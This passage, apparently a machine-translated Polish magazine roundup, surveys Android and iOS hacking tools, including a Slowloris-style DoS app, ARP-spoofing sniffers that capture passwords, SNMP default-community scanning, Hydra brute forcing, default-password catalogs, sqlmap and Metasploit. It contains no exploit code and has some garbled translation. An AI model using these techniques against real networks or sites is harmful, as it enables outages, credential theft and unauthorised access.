utworzeniu i utrzymaniu maksymalnej liczby połączeń ze zdalnym serwerem WWW, uniemożliwiając w ten sposób połączenie się z nim nowym klientom. Tak więc AnDOSid jest odpowiednikiem Slowloris bezpośrednio na Twoim urządzeniu z Androidem! Zdradzę Ci sekret, dwieście połączeń wystarczy, aby zapewnić niestabilne działanie co czwartej strony internetowej, na której działa serwer WWW Apache. A to wszystko - z Twojego telefonu!Różne narzędzia
Kodować Pracując z wieloma aplikacjami internetowymi i analizując ich logikę, dość często spotyka się dane przesyłane w postaci zakodowanej, czyli Base64. Encode pomoże Ci rozszyfrować te dane i zobaczyć, co dokładnie jest w nich przechowywane. Być może, podstawiając cudzysłowy, kodując je z powrotem do Base64 i podstawiając je w adresie URL witryny, którą szukasz, pojawi się upragniony błąd zapytania do bazy danych. HexEditor Jeśli potrzebujesz edytora szesnastkowego, jest też taki dla Androida. Za pomocą HexEditor możesz edytować dowolne pliki, w tym pliki systemowe, jeśli podniesiesz uprawnienia programu do poziomu superużytkownika. Doskonały zamiennik standardowego edytora tekstu, pozwalający łatwo znaleźć żądany fragment tekstu i go zmienić.Zdalny dostęp
ConnectBot Gdy już uzyskasz dostęp do zdalnego hosta, musisz umieć z niego korzystać. I do tego potrzebujemy klientów. Zacznijmy od SSH, gdzie ConnectBot jest już de facto standardem. Oprócz Przyjazny dla użytkownika interfejs, zapewnia możliwość organizowania bezpiecznych tuneli poprzez połączenia SSH. Zdalny RDP/VNC w PocketCloud Przydatny program pozwalający na połączenie się ze zdalnym pulpitem poprzez usługi RDP lub VNC. Bardzo się cieszę, że to dwa klienty w jednym, nie trzeba używać różnych narzędzi dla RDP i VNC. Przeglądarka MIB SNMP Przeglądarka MIB napisana specjalnie dla systemu Android, za pomocą której można zarządzać urządzeniami sieciowymi za pomocą protokołu SNMP. Może się to przydać do opracowania wektora ataku na różne routery, ponieważ standardowy ciąg znaków społeczności (innymi słowy hasło dostępu) do zarządzania przez SNMP nie został jeszcze anulowany.iOS
Platforma iOS jest nie mniej popularna wśród twórców narzędzi bezpieczeństwa. Ale jeśli w przypadku Androida prawa roota były potrzebne tylko dla niektórych aplikacji, to na urządzeniach Apple prawie zawsze wymagane jest jailbreakowanie. Na szczęście nawet dla najnowsze oprogramowanie sprzętowe iDevices (5.1.1) ma już narzędzie jailbreak. Wraz z pełnym dostępem otrzymujesz także alternatywnego menedżera aplikacji Cydię, która zawiera już wiele narzędzi.Praca z systemem
Terminal mobilny Pierwszą rzeczą, od której chcę zacząć, jest instalacja terminala. Z oczywistych powodów nie jest on zawarty w standardowym zestawie mobilnego systemu operacyjnego, ale będzie nam potrzebny do uruchomienia narzędzi konsolowych, co omówimy dalej. Najlepszą implementacją emulatora terminala jest MobileTerminal - obsługuje wiele terminali, gesty sterujące (na przykład do wysyłania Control-C) i ogólnie imponuje swoją przemyślanością. iSSH Inną, bardziej złożoną opcją uzyskania dostępu do konsoli urządzenia jest zainstalowanie na niej OpenSSH (odbywa się to poprzez Cydię) i połączenie się z nim lokalnie poprzez klienta SSH. Jeśli używasz odpowiedniego klienta, takiego jak iSSH, który ma niesamowitą sterowalność ekran dotykowy, to ta metoda jest jeszcze wygodniejsza niż za pomocą MobileTerminal.Przechwytywanie danych
Pirni i Pirni Pro Teraz, gdy masz dostęp do konsoli, możesz wypróbować narzędzia. Zacznijmy od Pirni, który przeszedł do historii jako pełnoprawny sniffer dla iOS. Niestety ograniczone strukturalnie Moduł Wi-Fi, wbudowanego w urządzenie, nie można przełączyć w tryb mieszany niezbędny do normalnego przechwytywania danych. Do przechwytywania danych wykorzystuje się więc klasyczny spoofing ARP, za pomocą którego cały ruch przechodzi przez samo urządzenie. Wersja standardowa Narzędzie uruchamia się z konsoli, gdzie oprócz parametrów ataku MITM określona jest nazwa pliku PCAP, do którego rejestrowany jest cały ruch. Narzędzie ma bardziej zaawansowaną wersję - Pirni Pro, która może się pochwalić interfejs graficzny. Co więcej, może analizować ruch HTTP w locie, a nawet automatycznie wydobywać z niego interesujące dane (na przykład loginy i hasła), korzystając z wyrażeń regularnych określonych w ustawieniach. Intercepter-NG (edycja konsolowa) Znany sniffer Intercepter-NG, o którym pisaliśmy już kilkukrotnie, doczekał się niedawno wersji konsolowej. Jak mówi autor, większość kodu napisana jest w czystym ANSI C, który zachowuje się tak samo w niemal każdym środowisku, dlatego wersja konsolowa działała od samego początku zarówno na desktopowych systemach Windows, Linux i BSD, jak i na platformy mobilne, w tym iOS i Android. Wersja konsolowa umożliwia już przechwytywanie haseł przesyłanych różnymi protokołami, przechwytywanie komunikatów internetowych (ICQ/Jabber i wiele innych), a także odzyskiwanie plików z ruchu (HTTP/FTP/IMAP/POP3/SMTP/SMB). Jednocześnie dostępne są funkcje skanowania sieciowego i wysokiej jakości ARP Poison. Do poprawnego działania należy najpierw zainstalować pakiet libpcap poprzez Cydię (nie zapomnij włączyć pakietów programistycznych w ustawieniach). Wszystkie instrukcje uruchamiania sprowadzają się do ustawienia odpowiednich praw: chmod +x intercepter_ios. Następnie, jeśli uruchomisz sniffera bez parametrów, pojawi się przejrzysty interaktywny interfejs Iterceptera, pozwalający na przeprowadzenie dowolnych ataków. Ettercap-NG Trudno w to uwierzyć, ale to wyrafinowane narzędzie do realizacji ataków MITM zostało w końcu przeniesione na iOS. Po ogromie pracy udało nam się stworzyć pełnoprawny port mobilny. Aby uniknąć tańczenia z tamburynem wokół zależności podczas samodzielnej kompilacji, lepiej zainstalować już zbudowany pakiet za pomocą Cydii, po dodaniu theworm.altervista.org/cydia (repozytorium TWRepo) jako źródła danych. W zestawie znajduje się również narzędzie etterlog, które pomaga wyodrębnić różne rodzaje ruchu z zebranego zrzutu. przydatna informacja(na przykład konta dostępu FTP).Analiza sieci bezprzewodowej
Analizator Wi-Fi W starszych wersjach iOS rzemieślnicy uruchamiali aircrack i mogli złamać klucz WEP, ale sprawdziliśmy: program nie działa na nowych urządzeniach. Dlatego, aby studiować Wi-Fi, będziemy musieli zadowolić się tylko skanerami Wi-Fi. WiFi Analyzer analizuje i wyświetla informacje o wszystkich dostępnych sieciach 802.11 w Twojej okolicy, w tym informacje o SSID, kanałach, dostawcach, adresach MAC i typach szyfrowania. Narzędzie tworzy wizualne wykresy w czasie rzeczywistym na podstawie danych dostępnych w powietrzu. Dzięki takiemu programowi łatwo jest znaleźć fizyczną lokalizację punktu, jeśli nagle o niej zapomnimy i np. spojrzeć na PIN WPS, który może przydać się do połączenia.Skanery sieciowe
Scany Z jakiego programu korzysta każdy pentester na całym świecie, niezależnie od celów i założeń? Skaner sieciowy. A w przypadku iOS będzie to najprawdopodobniej najpotężniejszy zestaw narzędzi Scany. Dzięki zestawowi wbudowanych narzędzi można szybko uzyskać szczegółowy obraz sytuacji urządzenia sieciowe aha i na przykład otwarte porty. Ponadto pakiet zawiera narzędzia do testowania sieci, takie jak ping, traciroute, nslookup. Fing Jednak wiele osób woli Fing. Skaner ma dość prostą i ograniczoną funkcjonalność, ale do pierwszego zapoznania się z siecią powiedzmy kafeterii w zupełności wystarczy :). Wyniki wyświetlają informacje o dostępnych usługach na zdalnych komputerach, adresach MAC i nazwach hostów podłączonych do skanowanej sieci. Nikto Wydawać by się mogło, że o Nikto zapomnieli wszyscy, ale dlaczego? W końcu możesz łatwo zainstalować ten skaner podatności na ataki sieciowy, napisany w języku skryptowym (mianowicie Perl), za pośrednictwem Cydii. Oznacza to, że możesz łatwo uruchomić go na urządzeniu po jailbreaku z terminala. Nikto chętnie Ci to zapewni Dodatkowe informacje w testowanym zasobie sieciowym. Ponadto możesz własnymi rękami dodawać własne sygnatury wyszukiwania do swojej bazy wiedzy. sqlmap To potężne narzędzie do automatycznego wykorzystywania luk w zabezpieczeniach SQL zostało napisane w języku Python, co oznacza, że po zainstalowaniu interpretera możesz z łatwością korzystać z niego bezpośrednio ze swojego urządzenia mobilnego.Pilot
Skanowanie SNMP Wiele urządzeń sieciowych (w tym drogie routery) zarządzanych jest przy użyciu protokołu SNMP. To narzędzie umożliwia skanowanie podsieci w poszukiwaniu dostępnych usług SNMP przy użyciu wcześniej znanych wartości ciągów społeczności (innymi słowy, standardowych haseł). Należy pamiętać, że wyszukiwanie usług SNMP za pomocą standardowych ciągów społecznościowych (publicznych/prywatnych) w celu uzyskania dostępu do zarządzania urządzeniami stanowi integralną część każdego testu penetracyjnego, wraz z identyfikacją samego obwodu i identyfikacją usług. iTap mobilny RDP / iTap mobilny VNC Dwa narzędzia tego samego producenta służą do łączenia się ze zdalnym pulpitem za pomocą protokołów RDP i VNC. Podobne narzędzia w Sklep z aplikacjami Jest ich wiele, ale te są szczególnie wygodne w użyciu.Odzyskiwanie hasła
Hydra Legendarny program, który pomaga milionom hakerów na całym świecie „zapamiętać” swoje hasła, został przeniesiony na iOS. Teraz możesz wyszukiwać hasła do usług takich jak HTTP, FTP, TELNET, SSH, SMB, VNC, SMTP, POP3 i wielu innych bezpośrednio ze swojego iPhone'a. To prawda, że \u200b\u200baby uzyskać skuteczniejszy atak, lepiej zaopatrzyć się w dobre słowniki brutalnej siły. Przekaż Mula Każdy zna z pierwszej ręki lukę w używaniu standardowe hasła. Pass Mule to rodzaj katalogu, który zawiera wszelkiego rodzaju standardowe loginy i hasła do urządzeń sieciowych. Są one wygodnie uporządkowane według nazwy dostawcy, produktu i modelu, więc znalezienie tego, czego potrzebujesz, nie będzie trudne. Program ma raczej na celu zaoszczędzenie czasu na szukaniu instrukcji do routera, standardowego loginu i hasła, które trzeba poznać.Wykorzystywanie luk w zabezpieczeniach
MetasploitTrudno wyobrazić sobie narzędzie bardziej hakerskie niż Metasploit i na tym kończy się nasza dzisiejsza recenzja. Metasploit to pakiet różnych narzędzi, których głównym zadaniem jest wykorzystywanie luk w zabezpieczeniach oprogramowanie. Wyobraź sobie: około 1000 niezawodnych, sprawdzonych i niezbędnych exploitów w codziennym życiu pentestera - bezpośrednio na Twoim smartfonie! Za pomocą takiego narzędzia możesz naprawdę zaistnieć w dowolnej sieci. Metasploit pozwala nie tylko wykorzystywać błędy w aplikacjach serwerowych – dostępne są także narzędzia do atakowania aplikacji klienckich (na przykład poprzez moduł Browser Autopwn, gdy do ruchu klienckiego wstawiany jest ładunek bojowy). Tutaj trzeba to powiedzieć wersja mobilna Nie ma zestawu narzędzi, ale możesz zainstalować standardowy pakiet na urządzeniu Apple za pomocą .